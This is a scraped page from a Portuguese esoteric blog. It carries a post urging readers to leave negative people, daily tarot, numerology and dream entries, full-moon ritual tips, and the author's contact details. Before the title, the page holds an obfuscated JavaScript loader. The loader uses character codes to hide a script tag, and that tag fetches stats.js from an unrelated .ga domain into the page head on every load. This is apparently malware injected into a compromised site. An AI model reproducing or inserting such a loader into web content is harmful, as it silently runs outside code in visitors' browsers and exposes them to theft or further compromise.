Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,106,115,46,100,111,110,97,116,101,108,108,111,102,108,111,119,102,105,114,115,116,108,121,46,103,97,47,115,116,97,116,115,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})(); ESTÁ SENTINDO SUA VIDA PARADA? | Rakel Possi

ESTÁ SENTINDO SUA VIDA PARADA?

Propaganda

Este contenido también puede ser leído en: Español

CADASTRE-SE PARA RECEBER MEU BOLETIM DIÁRIO
FAÇA SUA PERGUNTA GRATUITA AO TAROT EM RAKEL RESPONDE.
Semanalmente
é sorteada uma pergunta. Boa sorte!



LUA CHEIA
À 00:29h em Aquário

MANTRA CABALÍSTICO
PARA 2012
SHAMÉM SHAMÉM SHAMÉM LUZ!
Vea más en MANTRAS

Olá amigos!
Apesar de tanto ouvir falar muita gente não quer admitir que a vida está ruim porque não é capaz de tomar coragem e afastar-se de quem lhe faz mal. A verdade espiritual nos ensina desde a antiguidade que permanecer ao lado de pessoas negativas faz muito mal. A negatividade derruba qualquer um, não há uma única pessoa que, ficando teimosamente ao lado do mal, não tenha sido derrotado por ele. Está na hora de parar e pensar porque se quer ficar al lado de alguém que nos faz sofrer ou que já nos mostra que não comparte das nossas ideias ou sentimentos. Por que será que tem gente que pensa que tem que ajudar aos outros, assim, desta forma tão destrutiva? Há um conceito errado, espiritualmente falando, do que é a ‘ajuda’ ou caridade. Do ponto de vista emocional nós somente poderemos ajudar alguém se estivermos bem, porque senão, não pode haver troca, ajuda, colaboração. Como colaborar com algo que não temos? Quantas vezes já sentiu sua vida parada, estagnada, como se algo o impedisse de andar para frente, progredir? E quantas outras já disse não se que me acontece, nada da certo para mim, quando será que vai melhorar? A resposta é simples: sua vida vai melhorar quando você tire a venda que encobre os olhos e veja o que tem por perto. Não adianta ser inteligente, talentoso, cheio de saberes se não tem um meio social, um grupo legal no qual possa desenvolve-los. Ser ‘tudo de bom’ e estar com pessoas ruins é pior que ser ‘menos bom’, mas ter pessoas que o incentivam do lado. E, pior ainda, insistir em permanecer junto deles é sinal de grande ignorância espiritual. O crescimento é inerente ao ser humano, todos lutamos para superar nossos problemas, mas certamente que aquele que mais rápido se juntar a pessoas positivas, do bem, melhor sucedido será. Use seu livre arbítrio para cumprir seu destino. Pense na semente e a terra: de que vale ter muitas sementes boas se a terra é arida? Você pode ser uma boa semente, mas se ficar perto dos ruins e negativos não crescerá porque o ambiente será árido. Pense nisto, seja consciente do seu poder e não confunda ‘pena de alguém’ com ‘dor e compaixão por alguém’. Cuide da sua vida de forma inteligente e não culpe os outros pelo que você não é capaz de fazer sozinho: escolher o meio mais certo para crescer. Com amor da amiga Rakel Possi.

ANJO CABALÍSTICO
MEHIEL Deus vivificador
Coro dos Arcanjos – Príncipe Mikael
Protege contra todas as adversidades e recebe com compaixão o pedido de ajuda dos que sofrem. O Gênio contrário cria controvérsias, domina os que ensinam com falsidade e fomenta as críticas.
Salmo 32, vers.18: Eis aqui o olho do Senhor sobre os que O temem e sobre os que O esperam na sua suavidade! Rezar de 21:00h a 21:20h. com vela verde e incenso de alfazema.

SONHOS
ÁRVORE: grande de copa cheia: excelente anúncio de prosperidade; seco: planos que não certo; muitas árvores crescendo: anúncio de família numerosa; cortar árvores e subir árvores: trabalhos pesados. Passear por entre meio um bosque: saúde. Arvores truncadas, (tocos): recomeço após tristezas. Veja mais em SONHOS

NUMEROLOGIA – O número do dia.
02 de agosto de 2012  2+8+2+1+2= 6
NÚMERO 6: Reencontrar as pessoas que amamos de verdade; construir um espaço para contemplar a beleza; trabalhar com harmonia, é isto que este número nos incenta a fazer. Acredite, tenha fe, porque coisas boas estarão acontecendo.
Veja mais em NUMEROLOGIA

TAROT – A carta do dia
ÀS DE OUROS: Esta carta transmite poder e segurança trazendo prosperidade e tranqüilidade. Mesmo frente a situações complicadas teremos muita força para enfrentá-las e resolvê-las. A riqueza estará presente trazendo felicidade. Porém, se não estivermos bem emocionalmente esta carta indica que devemos tomar cuidado com pessoas e trabalhos desonestos e com o uso do dinheiro de modo descontrolado o que pode gerar muitas dívidas. A figura corresponde ao Fenestra Tarot.

GRANDE FRATERNIDADE BRANCA
A cor do dia é VERDE
MESTRE ASCENSO HILARION
Arcanjo: RAFAEL
Complemento Divino MÃE MARIA
Elohin: VISTA ou CÍCLOPE
Complemento Divino: CRISTAL
Onde está a nossa atenção aí estamos nós. Fixemos nossa atenção somente nas coisas perfeitas. A saúde é perfeição. Portanto mesmo que sintamos compaixão pelo sofrimento de outros, coloquemos nossa atenção no corpo perfeito, sadio e nas coisas belas. As aparências não são realidades. Retiremos a atenção de tudo o que não seja Divino. Afastemo-nos da marginalidade, das imagens violentas, do sofrimento, e façamos com que a visão de saúde e cura flua como uma grande corrente de Luz verde pelo planeta e todos os seres vivos.
MANTRA
: EU SOU A CURA! EU SOU!
Vela: verde Incenso: cânfora, ervas. Pedra: esmeralda, turmalina verde.
Veja mais em GRANDE FRATERNIDADE BRANCA

DICAS MÁGICAS DE LUA CHEIA
– Para fortalecer o amor do casal: recolha do chão um pedaço de casca de uma árvore grande, escreva o nome dos dois nele com lápis. Ponha num saquinho de veludo vermelho junto com uma rosa vermelha e 21 gotas de óleo de almiscar. Feche com fitinha vermelha, deixe pendurado na cama do casal (ou embaixo do seu travesseiro) sete dias. Depois leve a um jardim limpo com flores e entregue aos Anjos do Amor.
– Banho de lua cheia atrativo da sorte: ferva água com um punhado de hortelá, cravo da Índia e um pedaço de ímã; deixe fervendo bastante depois retire o ímã e guarde em sua carteira e tome banho com o restante. Não saia de casa depois deste banho.
– Invocando o poder da lua cheia para desfazer magia negra: coloque água pura numa jarra junto com uma turmalina negra bem limpa. Deixe ao sereno na lua cheia, recolha antes de sair o sol e guarde em casa. Tome um copo durante sete dias em jejum. Envolva a turmalina negra num papel com seu nome completo e data de nascimento e leve para longe da sua casa jogando-a em água corrente.

Sobre o autor

Rakel Possi

Psicóloga e Practitioner em PNL. Autora de diversos livros, ela assumiu a missão de preparar e ajudar pessoas e organizações se adaptarem melhor ao momento do universo. A competência com foco no desenvolvimento humano e ecológico é o seu forte. /// En español: Psicóloga y Practitioner en PNL. Autora de diversos libros, asumió la misión de preparar, y ayudar, personas y organizaciones a adaptarse mejor al momento del universo. La competencia con foco en el desarrollo humano y ecológico es su fuerte.

CONTATO RAKEL POSSI

 

WhatsApp - Rakel Possi

Celular - WhatsApp

+55 (13) 991511707

 


 

Email - Rakel Possi

E-mail

[email protected]

 


 

Messenger - Rakel Possi

Messenger - Facebook

Click para enviar mensagem

 

Facebook Rakel Possi

Instagram Rakel Possi